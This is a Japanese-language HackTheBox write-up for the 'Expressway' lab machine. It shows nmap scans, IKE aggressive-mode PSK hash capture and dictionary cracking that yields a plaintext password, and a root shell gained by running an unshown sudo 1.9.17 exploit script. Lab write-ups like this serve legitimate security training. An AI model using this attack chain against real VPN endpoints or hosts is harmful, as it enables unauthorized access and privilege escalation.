🤖
[HackTheBox] Expressway-writeup
machineinfo
- linux
- easy
recon
┌──(notthei㉿kali)-[~]
└─$ nmap -sCV -T4 -Pn 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 13:21 JST
Nmap scan report for 10.10.11.87
Host is up (0.59s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds
tcpは22番しか空いていませんでした
┌──(notthei㉿kali)-[~]
└─$ nmap 10.10.11.87 -sU --top-ports 100
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 13:28 JST
Nmap scan report for 10.10.11.87
Host is up (0.26s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Nmap done: 1 IP address (1 host up) scanned in 102.66 seconds
UDPだと上記のそれぞれが得られました
ikescan
isakmpについて気になったので調べてみました
要は通信相手と認証、鍵交換などを行い安全にトンネル通信を確立するそうです
┌──(notthei㉿kali)-[~]
└─$ sudo ike-scan -M 10.10.11.87
[sudo] password for notthei:
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=afce6c4d9b34dc40)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
暗号化に3DESでハッシュにSHA1、鍵交換に1024-bit DHなのでブルートフォースでクラックできそう
┌──(notthei㉿kali)-[~]
└─$ sudo ike-scan -A -P -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=354d7765341f64f4)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
9213525e6688e5a1dae9cfa82b93ec631b87f0d1c4bebf64639cf128e1c36b0d8904e6b00cc4e646639cbc37a7da386711860dfd80a9d579e26b381005bcee46177fe050119fc2f798e9dd7049141ac0f3c8128ffaa69edeed87ed38005a6bb238f837f1f5888806becaa2f2bcff47b1859a485d2822b03993835e7ac184b9a1:4f39e970eb7ae9493ce229140e0d26d0868304fcec529b53b6f3e3f03bd03fdcbee196f634808ea797c0658b5fe0edafcd3652cd1f96a38624122324ddc5f1a402cf0ea38586fee6580c8826e8dd183b83edc00a4279a948a00012b53290d5d1afc3e91a1cad2bae54b4bf3b6d0bd7a92e19d12dfa978edcfcf591eabd07e3cc:354d7765341f64f4:db25d24d4fe3f2d7:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d59a0b084363c7efee551e3d6349caa128405580:0fc309790dc17bdbee4ed23ce177e660566b81614cd42e16ab6e687dd75f6a0a:8c37c1c7c30a426e85e7c51e0f3530e9c57c259c
ikeというユーザを発見しました。
psk-crackでハッシュを割ります
┌──(notthei㉿kali)-[~]
└─$ psk-crack -d /usr/share/wordlists/rockyou.txt psk.psk
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash da79f5f042eabada0fcaec438804958f770f876d
Ending psk-crack: 8045040 iterations in 2.692 seconds (2988470.39 iterations/sec)
パスワードが割り出せました。
user
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
root
sudoのバージョンを確認したら1.9で脆弱性があることがわかりました。
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$ sh exp.sh
[*] Running exploit…
root@expressway:/# whoami
root
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Discussion